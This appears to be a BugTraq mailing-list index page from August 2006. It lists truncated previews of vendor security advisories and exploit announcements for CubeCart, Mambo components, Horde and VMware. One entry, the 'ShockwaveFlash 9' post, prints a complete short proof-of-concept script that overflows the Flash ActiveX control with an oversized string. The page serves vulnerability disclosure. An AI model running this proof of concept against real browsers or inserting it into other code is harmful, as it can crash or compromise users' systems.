BugTraq
Re: Re: CGI Script Source Code Disclosure Vulnerability in Apache for Windows 2006-08-17
nareshhacker gmail com
This _is_ a vulnerability.

Even though the common convention is never to include 'cgi-bin' within the document-root, still, many companies put 'cgi-bin' inside the document-root assuming it to be a safe practice.

No matter what the common convention is; the fact is, if the cgi-bin directory i

CubeCart <= 3.0.11 SQL injection & cross site scripting 2006-08-17
rgod autistici org
--------------------------------------------------------------------------------

CubeCart <= 3.0.11 SQL injection & cross site scripting

software:

site: http://www.cubecart.com/site/home/

description: "CubeCart is an eCommerce script written with PHP & MySQL. With

CubeCart you can setup a power

Registration Now Open!: Security OPUS Infosec Conference - Oct 2-5 2006 - San Francisco, CA 2006-08-17
Richard Lindberg (Richard IdealRealms com)
Registration for the Security OPUS Infosec conference in San Francisco is
now open.

http://www.SecurityOPUS.com

We have a new venue this year; The W hotel!
http://www.starwoodhotels.com/whotels/index.html Discounted rooms are
available, but limited. Ask for the Security OPUS rate when booking.

R

[USN-336-1] binutils vulnerability 2006-08-17
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-336-1 August 16, 2006
binutils vulnerability
http://bugs.gentoo.org/show_bug.cgi?id=99464
===========================================================

A security issue affects the following Ubuntu rele

[EEYEB-20060703] IBM eGatherer ActiveX Code Execution Vulnerability 2006-08-16
eEye Advisories (Advisories eeye com)
IBM eGatherer ActiveX Code Execution Vulnerability

Release Date:
August 16, 2006

Date Reported:
July 3, 2006

Patch Development Time (in days):
44

Severity:
High (Remote Code Execution)

Vendor:
IBM / Lenovo

Systems Affected:
Windows NT 4.0 (All versions)
Windows 2000 (All versions)
Windows XP (

[USN-337-1] imagemagick vulnerability 2006-08-17
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-337-1 August 16, 2006
imagemagick vulnerability
CVE-2006-4144
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.

powergap <= (s0x.php) Remote File Inclusion 2006-08-17
saudi unix hotmail com
#=================================================================

#powergap <= (s0x.php) Remote File Inclusion Exploit

#================================================================

# |

#Critical Level : Dangerous

discloser 0.0.4 Remote File Inclusion (with Exploit) 2006-08-16
dr t3rr0r1st yahoo com
#!/usr/bin/perl

########################################################################
###################

# Aria-Security.net Advisory #

# Discovered by: Dr.t3rr0r1st #

[security bulletin] HPSBUX02139 SSRT5981 rev.1 - HP-UX Running the LP Subsystem, remote Denial of Service (DoS) 2006-08-17
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00746980
Version: 1

HPSBUX02139 SSRT5981 rev.1 - HP-UX Running the LP Subsystem, remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as

[ MDKSA-2006:143 ] - Updated Firefox packages fix multiple vulnerabilities 2006-08-16
security mandriva com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:143
http://www.mandriva.com/security/
____________________________________________________________________

SYM06-16 Symantec NetBackup PureDisk Remote Office Edition Elevation of Privilege 2006-08-16
Mike Prosser (mprosser symantec com)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Symantec Security Advisory

SYM06-015

16 August 2006

Symantec NetBackup PureDisk: Non-Privileged User Authentication Bypass
Elevation of Privilege

Revision History
None

Severity
Medium (highly dependent on network configuration)

Remote Access

Technical note by Amit Klein: "Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)" 2006-08-16
Amit Klein (AKsecurity) (aksecurity hotpop com)
Sending arbitrary HTTP requests with Flash 7/8 (+IE 6.0)

Amit Klein, August 2006

The trick
=========

In [1], I showed how to forge parts of HTTP requests containing
CRs and LFs using Flash. In that write-up, the data was part of the
HTTP body section. However, combining the Content

[security bulletin] HPSBUX02115 SSRT061077 rev.2 - HP-UX running Support Tools Manager (xstm, cstm, stm) Local Denial of Service (DoS) 2006-08-16
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00657001
Version: 2

HPSBUX02115 SSRT061077 rev.2 - HP-UX running Support Tools Manager (xstm, cstm, stm)
Local Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should b

ShockwaveFlash 9 (Stack overflow) 2006-08-16
Mr Niega gmail com
<!-- Credits : MarjinZ -->

<script>

var a = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9');

var c = 'ftp://';

var b = 'A';

while (b.length <= 51512*512) b+=b;

a.AllowScriptAccess = c+b;

</script>

Reporter Mambo Component Remote File Include 2006-08-16
crackers_child sibersavascilar com
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

--------------------------------------------------------------------------------

Title : Reporter Mambo Component Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

#Author: Crackers

MS Terminal Server application session breakout 2006-08-16
pedantic1 gmail com (1 replies)
Author: Bill Littlejohn

http://wklpc.blogspot.com/2006/08/easy-ms-terminal-server-desktop-hack.html

There is a vulnerability in Microsoft Terminal Server when an application is specified for the user instead of a full Windows Desktop. It is possible to easily cause an error in explorer.exe and t

Re: MS Terminal Server application session breakout 2006-08-16
Thor (Hammer of God) (thor hammerofgod com)
[scip_Advisory 2457] Horde Framework and Horde IMP /horde/imp/search.php cross site scripting 2006-08-16
Marc Ruef (maru scip ch)
Horde Framework and Horde IMP search.php cross site scripting

scip AG Vulnerability ID 2457 (08/16/2006)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2457

I. INTRODUCTION

Horde is an open-source web application framework based on PHP. It
offers popular applications, such as the Horde IMP mail c

[scip_Advisory 2456] Horde Framework and Horde IMP /index.php cross site referencing 2006-08-16
Marc Ruef (maru scip ch)
Horde Framework and Horde IMP /index.php cross site referencing

scip AG Vulnerability ID 2456 (08/16/2006)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2456

I. INTRODUCTION

Horde is an open-source web application framework based on PHP. It
offers popular applications, such as the Horde IMP mail

[USN-335-1] heartbeat vulnerability 2006-08-16
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-335-1 August 16, 2006
heartbeat vulnerability
CVE-2006-3121
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04
Ubuntu 5.10

Mambo com_lm component (archive.php) Remote File Include Vulnerabilities 2006-08-16
crackers_child sibersavascilar com
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

--------------------------------------------------------------------------------

Title : Mambo com_lm component (archive.php) Remote File Include Vulnerabilities

--------------------------------------------------------------------------------

#Author

Re: TinyWebGallery v1.5 ( image ) Remote Include Vulnerability 2006-08-16
tinywebgallery mdempfle de
Simply delete the examples folder - It's only there as examples. TWF 1.5.0.1 does protect this folder too!

[XSec-06-05]: VMware 5.5.1 for Windows arbitrary partition table delete issue. 2006-08-16
root (root xsec org)
Advisory ID:
XSec-06-05

Advisory Name:
VMware 5.5.1 for Windows arbitrary partition table delete issue.

Release Date:
08/16/2006

Tested on:
VMware 5.5.1 build-19175 on Windows Server 2000/2003

Affected version:
VMware 5.5.1

Author:
nop <nop#xsec.org>
http://www.xsec.org

Overview:
On running wi

[USN-334-1] krb5 vulnerabilities 2006-08-16
Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-334-1 August 16, 2006
krb5 vulnerabilities
CVE-2006-3083, CVE-2006-3084
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 5.04

Lizge V.20 Web Portal File Include Vulnerability 2006-08-15
crackers_child sibersavascilar com
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

--------------------------------------------------------------------------------

Title : Lizge V.20 Web Portal File Include Vulnerability

--------------------------------------------------------------------------------

#Author: Crackers_Child

#c

fusionnews 3,7 Remote File Inclusion 2006-08-15
Outlaw aria-security net
#!/usr/bin/perl

########################################################################
###################

# Aria-Security.net Advisory #

# Discovered by: OUTLAW #

#

[security bulletin] HPSBUX02141 SSRT51153 rev.1 - HP-UX in Trusted mode, Local Denial of Service (DoS) 2006-08-15
security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00749123

Version: 1

HPSBUX02141 SSRT51153 rev.1 - HP-UX in Trusted mode, Local Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible

Copyright 2010, SecurityFocus